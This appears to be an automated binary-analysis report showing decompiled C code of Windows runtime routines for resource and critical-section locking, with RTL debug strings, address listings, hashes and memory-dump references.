                                                                                                                                                                                    							asm("lock xadd [eax], ecx");
                                                                                                                                                                                    							_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                    							_a4 = _t32;
                                                                                                                                                                                    							__eflags = _t32;
                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                    								L19:
                                                                                                                                                                                    								_t86 = 0;
                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x027301c0;
                                                                                                                                                                                    									_push(_t92);
                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                    									_t37 = E0264F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                                                    									__eflags = _t37 - 0x102;
                                                                                                                                                                                    									if(_t37 != 0x102) {
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t71 =  *(_t92 + 4);
                                                                                                                                                                                    									_t85 =  *_t92;
                                                                                                                                                                                    									_t51 = E02694FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                                                    									_push(_t85);
                                                                                                                                                                                    									_push(_t51);
                                                                                                                                                                                    									E026A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                                                    									E026A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                                                    									_t86 = _t86 + 1;
                                                                                                                                                                                    									_t105 = _t104 + 0x28;
                                                                                                                                                                                    									__eflags = _t86 - 2;
                                                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                                                    										E026D217A(_t71, __eflags, _t64);
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                    									_push(0x65);
                                                                                                                                                                                    									E026A3F92();
                                                                                                                                                                                    									_t104 = _t105 + 0xc;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								__eflags = _t37;
                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                    									_push(_t37);
                                                                                                                                                                                    									E02693915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                                                    									asm("int3");
                                                                                                                                                                                    									_t40 =  *_t71;
                                                                                                                                                                                    									 *_t71 = 0;
                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                    										L1:
                                                                                                                                                                                    										_t42 = E02675384(_t92 + 0x24);
                                                                                                                                                                                    										if(_t42 != 0) {
                                                                                                                                                                                    											goto L31;
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											goto L2;
                                                                                                                                                                                    										}
                                                                                                                                                                                    									} else {
                                                                                                                                                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                                                    										_push( &_a4);
                                                                                                                                                                                    										_push(_t40);
                                                                                                                                                                                    										_t49 = E0264F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                                                    										__eflags = _t49;
                                                                                                                                                                                    										if(__eflags >= 0) {
                                                                                                                                                                                    											goto L1;
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											_push(_t49);
                                                                                                                                                                                    											E02693915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                                                    											L31:
                                                                                                                                                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                    											_push( &_a4);
                                                                                                                                                                                    											_push(1);
                                                                                                                                                                                    											_t42 = E0264F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                    											__eflags = _t42;
                                                                                                                                                                                    											if(__eflags >= 0) {
                                                                                                                                                                                    												L2:
                                                                                                                                                                                    												return _t42;
                                                                                                                                                                                    											} else {
                                                                                                                                                                                    												_push(_t42);
                                                                                                                                                                                    												E02693915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                                                    												_push( &_a4);
                                                                                                                                                                                    												_push(1);
                                                                                                                                                                                    												_t42 = E0264F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                                                    												__eflags = _t42;
                                                                                                                                                                                    												if(__eflags >= 0) {
                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                    												} else {
                                                                                                                                                                                    													_push(_t42);
                                                                                                                                                                                    													_t45 = E02693915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                                                    													asm("int3");
                                                                                                                                                                                    													while(1) {
                                                                                                                                                                                    														_t74 = _t45;
                                                                                                                                                                                    														__eflags = _t45 - 1;
                                                                                                                                                                                    														if(_t45 != 1) {
                                                                                                                                                                                    															break;
                                                                                                                                                                                    														}
                                                                                                                                                                                    														_t86 = _t86 | 0xffffffff;
                                                                                                                                                                                    														_t45 = _t74;
                                                                                                                                                                                    														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                    														__eflags = _t45 - _t74;
                                                                                                                                                                                    														if(_t45 != _t74) {
                                                                                                                                                                                    															continue;
                                                                                                                                                                                    														} else {
                                                                                                                                                                                    															_t46 =  *[fs:0x18];
                                                                                                                                                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                                                    															return _t46;
                                                                                                                                                                                    														}
                                                                                                                                                                                    														goto L38;
                                                                                                                                                                                    													}
                                                                                                                                                                                    													E02675329(_t74, _t92);
                                                                                                                                                                                    													_push(1);
                                                                                                                                                                                    													_t48 = E026753A5(_t92);
                                                                                                                                                                                    													return _t48;
                                                                                                                                                                                    												}
                                                                                                                                                                                    											}
                                                                                                                                                                                    										}
                                                                                                                                                                                    									}
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									_t32 =  *(_t64 + 0x28);
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t71 =  *_t79;
                                                                                                                                                                                    								__eflags = _t71;
                                                                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                    										_t57 = _t71;
                                                                                                                                                                                    										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                    										__eflags = _t57 - _t71;
                                                                                                                                                                                    										if(_t57 == _t71) {
                                                                                                                                                                                    											break;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										_t71 = _t57;
                                                                                                                                                                                    										__eflags = _t57;
                                                                                                                                                                                    										if(_t57 > 0) {
                                                                                                                                                                                    											continue;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t32 = _a4;
                                                                                                                                                                                    									__eflags = _t71;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                    									continue;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									goto L19;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t71 = _t71 | 0xffffffff;
                                                                                                                                                                                    					_t32 = 0;
                                                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                    						return 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L38:
                                                                                                                                                                                    			}


























                                                                                                                                                                                    0x026753ab
                                                                                                                                                                                    0x026753ae
                                                                                                                                                                                    0x026753b1
                                                                                                                                                                                    0x026753b4
                                                                                                                                                                                    0x026753b7
                                                                                                                                                                                    0x026905b6
                                                                                                                                                                                    0x026905c0
                                                                                                                                                                                    0x026905c3
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026905c9
                                                                                                                                                                                    0x026905c9
                                                                                                                                                                                    0x026905cc
                                                                                                                                                                                    0x026905d5
                                                                                                                                                                                    0x026905d5
                                                                                                                                                                                    0x026753bd
                                                                                                                                                                                    0x026753bd
                                                                                                                                                                                    0x026753bd
                                                                                                                                                                                    0x026753be
                                                                                                                                                                                    0x026753be
                                                                                                                                                                                    0x026753be
                                                                                                                                                                                    0x026753c0
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b2269
                                                                                                                                                                                    0x026b226d
                                                                                                                                                                                    0x026b2349
                                                                                                                                                                                    0x026b234d
                                                                                                                                                                                    0x026b2273
                                                                                                                                                                                    0x026b2276
                                                                                                                                                                                    0x026b2279
                                                                                                                                                                                    0x026b227e
                                                                                                                                                                                    0x026b2283
                                                                                                                                                                                    0x026b2287
                                                                                                                                                                                    0x026b228a
                                                                                                                                                                                    0x026b228d
                                                                                                                                                                                    0x026b228f
                                                                                                                                                                                    0x026b22bc
                                                                                                                                                                                    0x026b22bc
                                                                                                                                                                                    0x026b22bc
                                                                                                                                                                                    0x026b22be
                                                                                                                                                                                    0x026b22c4
                                                                                                                                                                                    0x026b22cc
                                                                                                                                                                                    0x026b22d0
                                                                                                                                                                                    0x026b22d6
                                                                                                                                                                                    0x026b22d7
                                                                                                                                                                                    0x026b22da
                                                                                                                                                                                    0x026b22df
                                                                                                                                                                                    0x026b22e4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b22e6
                                                                                                                                                                                    0x026b22e9
                                                                                                                                                                                    0x026b22f4
                                                                                                                                                                                    0x026b22f9
                                                                                                                                                                                    0x026b22fa
                                                                                                                                                                                    0x026b2305
                                                                                                                                                                                    0x026b2314
                                                                                                                                                                                    0x026b2319
                                                                                                                                                                                    0x026b231a
                                                                                                                                                                                    0x026b231d
                                                                                                                                                                                    0x026b2320
                                                                                                                                                                                    0x026b2323
                                                                                                                                                                                    0x026b2323
                                                                                                                                                                                    0x026b2328
                                                                                                                                                                                    0x026b232d
                                                                                                                                                                                    0x026b232f
                                                                                                                                                                                    0x026b2331
                                                                                                                                                                                    0x026b2336
                                                                                                                                                                                    0x026b2336
                                                                                                                                                                                    0x026b233b
                                                                                                                                                                                    0x026b233d
                                                                                                                                                                                    0x026b2350
                                                                                                                                                                                    0x026b2351
                                                                                                                                                                                    0x026b2356
                                                                                                                                                                                    0x026b2359
                                                                                                                                                                                    0x026b2359
                                                                                                                                                                                    0x026b235b
                                                                                                                                                                                    0x026b235d
                                                                                                                                                                                    0x02675367
                                                                                                                                                                                    0x0267536b
                                                                                                                                                                                    0x02675372
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b2363
                                                                                                                                                                                    0x026b2363
                                                                                                                                                                                    0x026b2369
                                                                                                                                                                                    0x026b236a
                                                                                                                                                                                    0x026b236c
                                                                                                                                                                                    0x026b2371
                                                                                                                                                                                    0x026b2373
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b2379
                                                                                                                                                                                    0x026b2379
                                                                                                                                                                                    0x026b237a
                                                                                                                                                                                    0x026b237f
                                                                                                                                                                                    0x026b237f
                                                                                                                                                                                    0x026b2385
                                                                                                                                                                                    0x026b2386
                                                                                                                                                                                    0x026b2389
                                                                                                                                                                                    0x026b238e
                                                                                                                                                                                    0x026b2390
                                                                                                                                                                                    0x02675378
                                                                                                                                                                                    0x0267537c
                                                                                                                                                                                    0x026b2396
                                                                                                                                                                                    0x026b2396
                                                                                                                                                                                    0x026b2397
                                                                                                                                                                                    0x026b239c
                                                                                                                                                                                    0x026b23a2
                                                                                                                                                                                    0x026b23a3
                                                                                                                                                                                    0x026b23a6
                                                                                                                                                                                    0x026b23ab
                                                                                                                                                                                    0x026b23ad
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b23b3
                                                                                                                                                                                    0x026b23b3
                                                                                                                                                                                    0x026b23b4
                                                                                                                                                                                    0x026b23b9
                                                                                                                                                                                    0x026b23ba
                                                                                                                                                                                    0x026b23ba
                                                                                                                                                                                    0x026b23bc
                                                                                                                                                                                    0x026b23bf
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a9153
                                                                                                                                                                                    0x026a9158
                                                                                                                                                                                    0x026a915a
                                                                                                                                                                                    0x026a915e
                                                                                                                                                                                    0x026a9160
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a9166
                                                                                                                                                                                    0x026a9166
                                                                                                                                                                                    0x026a9171
                                                                                                                                                                                    0x026a9176
                                                                                                                                                                                    0x026a9176
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a9160
                                                                                                                                                                                    0x026b23c6
                                                                                                                                                                                    0x026b23cb
                                                                                                                                                                                    0x026b23ce
                                                                                                                                                                                    0x026b23d7
                                                                                                                                                                                    0x026b23d7
                                                                                                                                                                                    0x026b23ad
                                                                                                                                                                                    0x026b2390
                                                                                                                                                                                    0x026b2373
                                                                                                                                                                                    0x026b233f
                                                                                                                                                                                    0x026b233f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b233f
                                                                                                                                                                                    0x026b2291
                                                                                                                                                                                    0x026b2291
                                                                                                                                                                                    0x026b2293
                                                                                                                                                                                    0x026b2295
                                                                                                                                                                                    0x026b229a
                                                                                                                                                                                    0x026b22a1
                                                                                                                                                                                    0x026b22a3
                                                                                                                                                                                    0x026b22a7
                                                                                                                                                                                    0x026b22a9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b22ab
                                                                                                                                                                                    0x026b22ad
                                                                                                                                                                                    0x026b22af
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b22af
                                                                                                                                                                                    0x026b22b1
                                                                                                                                                                                    0x026b22b4
                                                                                                                                                                                    0x026b22b4
                                                                                                                                                                                    0x026b22b6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b22b6
                                                                                                                                                                                    0x026b228f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026b226d
                                                                                                                                                                                    0x026753cb
                                                                                                                                                                                    0x026753ce
                                                                                                                                                                                    0x026753d0
                                                                                                                                                                                    0x026753d4
                                                                                                                                                                                    0x026753d6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026753d8
                                                                                                                                                                                    0x026753e3
                                                                                                                                                                                    0x026753ea
                                                                                                                                                                                    0x026753ea
                                                                                                                                                                                    0x026753d6
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026B22F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Resource at %p, xrefs: 026B230B
                                                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 026B22FC
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 026B2328
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2361587097.0000000002640000.00000040.00000001.sdmp, Offset: 02630000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.2361574580.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362039928.0000000002720000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362066586.0000000002730000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362087025.0000000002734000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362111006.0000000002737000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362129389.0000000002740000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362314296.00000000027A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                                                    • Opcode ID: 2458eef1d58e3ac8c5445986f932fe226ace2def92accd95f8b4a2fd4d6daf4c
                                                                                                                                                                                    • Instruction ID: 1a1ce30b4daf9f8376d5c45fcac0838fa8a76a02f0e84c3edd1c9e25b91690f5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2458eef1d58e3ac8c5445986f932fe226ace2def92accd95f8b4a2fd4d6daf4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: AA51D371600605ABEB15AF68DC90FA673EDAF44324F10466DED49DB390FB71E8818BA4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                    			E0267EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                    				short _v66;
                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                    				signed char _t67;
                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                    				intOrPtr* _t80;
                                                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                                                    				intOrPtr* _t85;
                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                    				void* _t93;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t80 = __edi;
                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                    				_t70 = __ecx;
                                                                                                                                                                                    				_t84 = _a4;
                                                                                                                                                                                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                                                    					E0266DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                                                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                    				__eflags = _t38 - 0xffffffff;
                                                                                                                                                                                    				if(_t38 == 0xffffffff) {
                                                                                                                                                                                    					_t39 =  *0x273793c; // 0x0
                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                    					_push(_t84);
                                                                                                                                                                                    					_t40 = E026516C0(_t39);
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					_t40 = E0264F9D4(_t38);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_pop(_t85);
                                                                                                                                                                                    				__eflags = _t40;
                                                                                                                                                                                    				if(__eflags < 0) {
                                                                                                                                                                                    					_push(_t40);
                                                                                                                                                                                    					E02693915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                                                    					asm("int3");
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						L21:
                                                                                                                                                                                    						_t76 =  *[fs:0x18];
                                                                                                                                                                                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                                                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                                                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                                                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                                                    							_v66 = 0x1722;
                                                                                                                                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                    							_t76 =  &_v72;
                                                                                                                                                                                    							_push( &_v72);
                                                                                                                                                                                    							_v28 = _t85;
                                                                                                                                                                                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                                                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                    							_push(0x20402);
                                                                                                                                                                                    							E026501A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                    							_t43 = _v8;
                                                                                                                                                                                    							_push(_t80);
                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                    							__eflags = _t43 - 0xffffffff;
                                                                                                                                                                                    							if(_t43 == 0xffffffff) {
                                                                                                                                                                                    								_t71 =  *0x273793c; // 0x0
                                                                                                                                                                                    								_push(_t85);
                                                                                                                                                                                    								_t44 = E02651F28(_t71);
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t44 = E0264F8CC(_t43);
                                                                                                                                                                                    							}
                                                                                                                                                                                    							__eflags = _t44 - 0x102;
                                                                                                                                                                                    							if(_t44 != 0x102) {
                                                                                                                                                                                    								__eflags = _t44;
                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                    									_push(_t44);
                                                                                                                                                                                    									E02693915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                                                    									asm("int3");
                                                                                                                                                                                    									E026D2306(_t85);
                                                                                                                                                                                    									__eflags = _t67 & 0x00000002;
                                                                                                                                                                                    									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                                                    										_t7 = _t67 + 2; // 0x4
                                                                                                                                                                                    										_t72 = _t7;
                                                                                                                                                                                    										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                                                    										__eflags = _t67 - _t67;
                                                                                                                                                                                    										if(_t67 == _t67) {
                                                                                                                                                                                    											E0267EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                                                    										}
                                                                                                                                                                                    									}
                                                                                                                                                                                    									return 0;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									__eflags = _v24;
                                                                                                                                                                                    									if(_v24 != 0) {
                                                                                                                                                                                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									return 2;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								goto L36;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                                                    							_push(_t67);
                                                                                                                                                                                    							_t46 = E02694FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                                                    							_push(_t77);
                                                                                                                                                                                    							E026A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                                                    							_t48 =  *_t85;
                                                                                                                                                                                    							_t92 = _t91 + 0x18;
                                                                                                                                                                                    							__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                    							if(_t48 == 0xffffffff) {
                                                                                                                                                                                    								_t49 = 0;
                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                    							_push(_t49);
                                                                                                                                                                                    							_t50 = _v12;
                                                                                                                                                                                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                                                    							_push(_t85);
                                                                                                                                                                                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                                                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                                                    							E026A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                                                    							_t53 =  *_t85;
                                                                                                                                                                                    							_t93 = _t92 + 0x20;
                                                                                                                                                                                    							_t67 = _t67 + 1;
                                                                                                                                                                                    							__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                    							if(_t53 != 0xffffffff) {
                                                                                                                                                                                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                    							}
                                                                                                                                                                                    							__eflags = _t67 - 2;
                                                                                                                                                                                    							if(_t67 > 2) {
                                                                                                                                                                                    								__eflags = _t85 - 0x27320c0;
                                                                                                                                                                                    								if(_t85 != 0x27320c0) {
                                                                                                                                                                                    									_t76 = _a4;
                                                                                                                                                                                    									__eflags = _a4 - _a8;
                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                    										E026D217A(_t71, __eflags, _t85);
                                                                                                                                                                                    									}
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_push("RTL: Re-Waiting\n");
                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                    							_push(0x65);
                                                                                                                                                                                    							_a8 = _a4;
                                                                                                                                                                                    							E026A3F92();
                                                                                                                                                                                    							_t91 = _t93 + 0xc;
                                                                                                                                                                                    							__eflags =  *0x7ffe0382;
                                                                                                                                                                                    							if( *0x7ffe0382 != 0) {
                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					return _t40;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L36:
                                                                                                                                                                                    			}

































                                                                                                                                                                                    0x0267ec56
                                                                                                                                                                                    0x0267ec56
                                                                                                                                                                                    0x0267ec56
                                                                                                                                                                                    0x0267ec5c
                                                                                                                                                                                    0x0267ec64
                                                                                                                                                                                    0x026b23e6
                                                                                                                                                                                    0x026b23eb
                                                                                                                                                                                    0x026b23eb
                                                                                                                                                                                    0x0267ec6a
                                                                                                                                                                                    0x0267ec6c
                                                                                                                                                                                    0x0267ec6f
                                                                                                                                                                                    0x026b23f3
                                                                                                                                                                                    0x026b23f8
                                                                                                                                                                                    0x026b23fa
                                                                                                                                                                                    0x026b23fc
                                                                                                                                                                                    0x0267ec75
                                                                                                                                                                                    0x0267ec76
                                                                                                                                                                                    0x0267ec76
                                                                                                                                                                                    0x0267ec7b
                                                                                                                                                                                    0x0267ec7c
                                                                                                                                                                                    0x0267ec7e
                                                                                                                                                                                    0x026b2406
                                                                                                                                                                                    0x026b2407
                                                                                                                                                                                    0x026b240c
                                                                                                                                                                                    0x026b240d
                                                                                                                                                                                    0x026b240d
                                                                                                                                                                                    0x026b240d
                                                                                                                                                                                    0x026b2414
                                                                                                                                                                                    0x026b2417
                                                                                                                                                                                    0x026b241e
                                                                                                                                                                                    0x026b2435
                                                                                                                                                                                    0x026b2438
                                                                                                                                                                                    0x026b243c
                                                                                                                                                                                    0x026b243f
                                                                                                                                                                                    0x026b2442
                                                                                                                                                                                    0x026b2443
                                                                                                                                                                                    0x026b2446
                                                                                                                                                                                    0x026b2449
                                                                                                                                                                                    0x026b2453
                                                                                                                                                                                    0x026b2455
                                                                                                                                                                                    0x026b245b
                                                                                                                                                                                    0x026b245b
                                                                                                                                                                                    0x0267eb99
                                                                                                                                                                                    0x0267eb99
                                                                                                                                                                                    0x0267eb9c
                                                                                                                                                                                    0x0267eb9d
                                                                                                                                                                                    0x0267eb9f
                                                                                                                                                                                    0x0267eba2
                                                                                                                                                                                    0x026b2465
                                                                                                                                                                                    0x026b246b
                                                                                                                                                                                    0x026b246d
                                                                                                                                                                                    0x0267eba8
                                                                                                                                                                                    0x0267eba9
                                                                                                                                                                                    0x0267eba9
                                                                                                                                                                                    0x0267ebae
                                                                                                                                                                                    0x0267ebb3
                                                                                                                                                                                    0x0267ebb9
                                                                                                                                                                                    0x0267ebbb
                                                                                                                                                                                    0x026b2513
                                                                                                                                                                                    0x026b2514
                                                                                                                                                                                    0x026b2519
                                                                                                                                                                                    0x026b251b
                                                                                                                                                                                    0x0267ec2a
                                                                                                                                                                                    0x0267ec2d
                                                                                                                                                                                    0x0267ec33
                                                                                                                                                                                    0x0267ec36
                                                                                                                                                                                    0x0267ec3a
                                                                                                                                                                                    0x0267ec3e
                                                                                                                                                                                    0x0267ec40
                                                                                                                                                                                    0x0267ec47
                                                                                                                                                                                    0x0267ec47
                                                                                                                                                                                    0x0267ec40
                                                                                                                                                                                    0x026522c6
                                                                                                                                                                                    0x0267ebc1
                                                                                                                                                                                    0x0267ebc1
                                                                                                                                                                                    0x0267ebc5
                                                                                                                                                                                    0x0267ec9a
                                                                                                                                                                                    0x0267ec9a
                                                                                                                                                                                    0x0267ebd6
                                                                                                                                                                                    0x0267ebd6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0267ebbb
